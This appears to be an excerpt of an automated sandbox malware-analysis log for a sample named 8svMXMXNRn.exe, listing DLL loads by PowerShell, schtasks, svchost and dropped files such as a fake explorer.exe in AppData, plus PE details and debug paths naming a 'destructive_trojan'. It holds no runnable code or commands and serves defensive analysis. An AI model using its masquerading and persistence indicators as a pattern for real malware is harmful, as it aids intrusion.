                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptsp.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: dxgidebug.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: dwmapi.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: riched20.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: usp10.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: msls31.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\AppData\Local\Temp\voosiq.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\8svMXMXNRn.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                      Source: explorer.lnk.2.drLNK file: ..\..\..\..\..\explorer.exe
                      Source: C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.19071.19011.0_x64__8wekyb3d8bbwe\Music.UI.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\BootstrapperV21.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: 8svMXMXNRn.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: 8svMXMXNRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: 8svMXMXNRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: 8svMXMXNRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: 8svMXMXNRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: 8svMXMXNRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: 8svMXMXNRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: 8svMXMXNRn.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: 8svMXMXNRn.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4870582452.000000001C3E0000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: fC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: 0C:\Windows\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4877362676.000000001C9E8000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\poros\Downloads\destructive_trojan\destructive_trojan\destructive_trojan\obj\Debug\TrojanXD.pdb source: voosiq.exe, 00000021.00000002.3973742662.00007FF789E06000.00000004.00000001.01000000.00000015.sdmp, TrojanXD.exe, 00000022.00000000.3938755617.000002BF9CD82000.00000002.00000001.01000000.00000016.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: BootstrapperV21.exe, 00000002.00000002.4863543107.000000001C333000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: yC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: wC:\Users\user\AppData\Local\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: hC:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000002AC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: oC:\Users\user\Local Settings\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: C:\Users\user\AppData\Local\Application Data\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: mscorlib.pdb8 source: BootstrapperV21.exe, 00000002.00000002.4851659921.000000001B690000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: ~C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: lC:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000034C9000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: iC:\Users\user\Local Settings\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: BootstrapperV21.exe, 00000002.00000002.4509858582.00000000048C9000.00000004.00000800.00020000.00000000.sdmp
